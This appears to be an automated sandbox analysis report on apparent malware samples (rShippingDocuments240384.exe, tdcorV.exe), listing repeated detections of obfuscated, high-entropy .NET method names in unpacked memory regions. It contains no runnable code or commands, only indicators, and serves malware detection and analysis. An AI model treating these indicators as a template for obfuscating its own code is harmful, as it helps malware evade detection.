Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, PVHmyBzNKgLOkVG9DC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, yXBUahHsaeO5hhL8ov.cs High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, AZSeLWoXNU2Em3evrk.cs High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, p0Jk0tplFOaPDwPQ51.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, DASuTkAqRlUt9qBnSNq.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, TDSE3NKycqKSaNDhhn.cs High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 0.2.rShippingDocuments240384.exe.4d31008.2.raw.unpack, uftO49xR6bPiYX0WeZ.cs High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, nDX2exV4Efol9EyBrT.cs High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, Xo85XTr6pLMvtWIQEd.cs High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, CLaABd8aCvmPHd6ibU.cs High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, An5xPAAA94KcU6ST43T.cs High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, SAdgCYYLpYY10rKVJB.cs High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, UV8J1A13b0WyAveFQ9.cs High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, kSZLAABypvSS9HaSQd.cs High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, cF51482gRxgBjOXKev.cs High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, QjYghpfU82Ev6r9qkG.cs High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, bqiyp6LBwn3U12aRJ6.cs High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, F3OmGHEIhtxRXq52Jf.cs High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, PVHmyBzNKgLOkVG9DC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, yXBUahHsaeO5hhL8ov.cs High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, AZSeLWoXNU2Em3evrk.cs High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, p0Jk0tplFOaPDwPQ51.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, DASuTkAqRlUt9qBnSNq.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, TDSE3NKycqKSaNDhhn.cs High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 0.2.rShippingDocuments240384.exe.4db5a28.0.raw.unpack, uftO49xR6bPiYX0WeZ.cs High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, nDX2exV4Efol9EyBrT.cs High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, Xo85XTr6pLMvtWIQEd.cs High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, CLaABd8aCvmPHd6ibU.cs High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, An5xPAAA94KcU6ST43T.cs High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, SAdgCYYLpYY10rKVJB.cs High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, UV8J1A13b0WyAveFQ9.cs High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, kSZLAABypvSS9HaSQd.cs High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, cF51482gRxgBjOXKev.cs High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, QjYghpfU82Ev6r9qkG.cs High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, bqiyp6LBwn3U12aRJ6.cs High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, F3OmGHEIhtxRXq52Jf.cs High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, PVHmyBzNKgLOkVG9DC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, yXBUahHsaeO5hhL8ov.cs High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, AZSeLWoXNU2Em3evrk.cs High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, p0Jk0tplFOaPDwPQ51.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, DASuTkAqRlUt9qBnSNq.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, TDSE3NKycqKSaNDhhn.cs High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 0.2.rShippingDocuments240384.exe.9650000.4.raw.unpack, uftO49xR6bPiYX0WeZ.cs High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, nDX2exV4Efol9EyBrT.cs High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, Xo85XTr6pLMvtWIQEd.cs High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, CLaABd8aCvmPHd6ibU.cs High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, An5xPAAA94KcU6ST43T.cs High entropy of concatenated method names: 'ToString', 'DH4gq7UXv3', 'IRXgf9rHCC', 'Eskgi7Xh4b', 'hFogJSjtn3', 'o9EgHf810j', 'kb4gpBKiym', 'avTgOQMgn3', 'eVJaDlwZ1aDwG87ABsY', 'tGdnHhwxJPucb1CL6GS'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, SAdgCYYLpYY10rKVJB.cs High entropy of concatenated method names: 'bKjONoY4gx', 'bLOOaaY3Km', 'MOdp5ZK0R4', 'zCVpvjqLPS', 'Ti3pXuH3hj', 'lU7pSuD499', 'JAVp1LylBO', 'hitpydXNUW', 'lVOp4hhQ4w', 'syepwWZL4b'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, UV8J1A13b0WyAveFQ9.cs High entropy of concatenated method names: 'xHNuJTc0fB', 'XV3uphZAlH', 'coDuQZeYpI', 'PgmQo9HtMb', 'K0ZQzNHoIo', 'cTJuGAdp3y', 'MFGuA7Pugh', 'tBZuVnCRbv', 'VkQuqdLLRq', 'nXpufeXcGB'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, mXGh2ItvGJ6dBbcXS6.cs High entropy of concatenated method names: 'Q9Vqi6k3Ki', 'P6QqJsrp1a', 'JR9qHaLqkF', 'zGqqp1Ww4T', 'GUfqOB1Tq6', 'IhXqQkZudW', 'ulSquyMpFa', 'eUoqtRaxgl', 'qmIqbPrPtC', 'VcbqIygAFA'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, kSZLAABypvSS9HaSQd.cs High entropy of concatenated method names: 'w8fTwqLjgP', 'tVPTM3UwRl', 'YusTBDSE4p', 'UXST9DZhoL', 'gyATebsLFu', 'mF0T53qEtL', 'UvfTv6mUXR', 'afiTX4ZKO6', 'f27TSu2GoQ', 'mRXT1cpFvH'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, cF51482gRxgBjOXKev.cs High entropy of concatenated method names: 'zjC0rOwpO8', 'zF60o9KVmm', 'iKrkGcbtaJ', 'bTvkAL1ISr', 'NhZ0ZgVtFg', 'xC00MZmQZB', 'lQK0KUgcKh', 'opY0BI9Oaf', 'XYv09YNo2M', 'e450FIToel'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, TB6hxiFXPOcvJ3LAlM.cs High entropy of concatenated method names: 'ToString', 'V5Q3Zj9jDZ', 'Bdg3e0gjMm', 'URS35GXueh', 'He63vHArsP', 'fHq3XdHrJU', 'cMh3SbfXTB', 'FKX31Va7Lq', 'eIv3ydIw9w', 'WFw347tBm1'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, QjYghpfU82Ev6r9qkG.cs High entropy of concatenated method names: 'f5AAuqiyp6', 'QwnAt3U12a', 'gIhAItxRXq', 'I2JAmfFAdg', 'WKVATJBaLa', 'bBdA3aCvmP', 'VId3PM94jK9NRZo1ta', 'IrCiKDACVWgC8leAIw', 'H7SAAKu1CF', 'j4dAqOrXMY'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, bqiyp6LBwn3U12aRJ6.cs High entropy of concatenated method names: 'A9VHBAdSQ6', 'XF1H9c65Xd', 'dMLHFoa8BK', 'XDcHC9Q0YI', 'r59HnecBqa', 'QvPH2G3UpR', 'J3hHcfeYfi', 'GtiHrsfK0j', 'oY8HxZE1N9', 'e8XHoflAEv'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, F3OmGHEIhtxRXq52Jf.cs High entropy of concatenated method names: 'TYIpWlKluy', 'vctpjMhJWC', 'pqTpLdMRPi', 'gq5pE3oiWd', 'qDlpTQO0L7', 'KW9p3JAG1c', 'uQgp0cljwV', 'Ra5pkIiMff', 'Kv9plhPPjW', 'ipLpgbyEyM'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, PVHmyBzNKgLOkVG9DC.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'hDFlRqLCPF', 'CfFlTui5hD', 'LW9l35Mufn', 'hH2l02NtTJ', 'UWglknDhXi', 'v4Dllqkfny', 'CBnlgGGBC2'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, yXBUahHsaeO5hhL8ov.cs High entropy of concatenated method names: 'Dispose', 'xK9AxE9GgX', 'bYYVeIk1K0', 'O4w227qH2k', 'FxoAo85XT6', 'hLMAzvtWIQ', 'ProcessDialogKey', 'EdDVGftO49', 'n6bVAPiYX0', 'zeZVVWZSeL'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, AZSeLWoXNU2Em3evrk.cs High entropy of concatenated method names: 'NxOlA9d56J', 'SMblqWuoES', 'NyhlfjXOs7', 'HnflJrmkeJ', 'enflHpgj7I', 'hNhlOt8SWs', 'nOxlQkAwP0', 'knskcoMEXa', 'WUxkrVlGTL', 'AE5kxDLu9V'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, p0Jk0tplFOaPDwPQ51.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'MSfVxUmlRS', 'kRDVo1068K', 'jWGVzh2pem', 'TZ5qGXZYPV', 'k4oqAmvKIX', 'yVAqVKnqkg', 'RCXqq2fwoS', 'qOgBeDg29wfL5UmmJny'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, DASuTkAqRlUt9qBnSNq.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'xhBgBHJfQX', 'D7xg91FCCc', 'IxRgFb3GjV', 'u67gCGr9Sl', 's7UgnFRiVn', 'eyfg2Txh8G', 'H7igcuqDUN'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, TDSE3NKycqKSaNDhhn.cs High entropy of concatenated method names: 'k4vRLK00kR', 'hi4RE0qmRn', 'Dj0R8nRAbX', 'CKKRe15MQd', 'SKxRvWwJJO', 'bY3RXDnQhe', 'o75R1jiNF0', 'NuDRyv9w9G', 'jU6RwQn63d', 'SeWRZrr9k7'
Source: 10.2.tdcorV.exe.45b2080.2.raw.unpack, uftO49xR6bPiYX0WeZ.cs High entropy of concatenated method names: 'vYTk8jmdak', 'EgXkeyLJBb', 'BVyk5X7BoQ', 'SxFkvOAs9a', 'LeKkBUymF2', 'DONkXMydHu', 'Next', 'Next', 'Next', 'NextBytes'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, iI9pqHAGtVb4t3pvgYZ.cs High entropy of concatenated method names: 'c03l7ONC3D', 'z9eldvjHkR', 'N0wlsNDG7V', 'ldRlWRKZVa', 'o01lNFRvaT', 'yuLljPqur7', 'SsclaSiS6C', 'YtMlLxHRyr', 'uUnlEBFb7a', 'Sf5lYjKYli'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, nDX2exV4Efol9EyBrT.cs High entropy of concatenated method names: 'VJqsgqPC4', 'nKxWgTDbo', 'RwkjcimEx', 'PQHa0EMe8', 'OEgEmRLtm', 'e05YvtvyZ', 'AXAqX0ptEFeW0fbbEv', 'zsTR5uakseBeCfNNuP', 'UxCkyIPoG', 'Et0gnwy4u'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, Xo85XTr6pLMvtWIQEd.cs High entropy of concatenated method names: 'a17kJA4X7y', 'sUjkHELgng', 'rTKkp7Qrl3', 'z56kO33URh', 'mCukQNDkdn', 'x9ukuJRsEf', 'RVDktWVURp', 'RqKkb6PA16', 'CuOkIrFyNY', 'FtakmQJvwL'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, qeqLvo4BFkGiHMAm7Y.cs High entropy of concatenated method names: 'Jv3u7kAwU4', 'kTZudIBXR2', 'Imlus2X8Om', 'ENMuWKmqX5', 'FRauNvgtif', 'bA5ujcUEmp', 'XeruauGGB7', 'BvXuLyoiyc', 'PuEuEtGEZV', 'vTJuYHLC1l'
Source: 10.2.tdcorV.exe.4636aa0.0.raw.unpack, CLaABd8aCvmPHd6ibU.cs High entropy of concatenated method names: 'RFhQii3WKR', 'QsbQH7K8xT', 'S0OQO4VMNY', 'O9AQu23NVl', 'DWqQtVBRa4', 'zC8OnCU9nm', 'nf6O2miVGb', 'cskOcEBo3l', 'EdvOrFtjIv', 'nwoOxqF8dH'
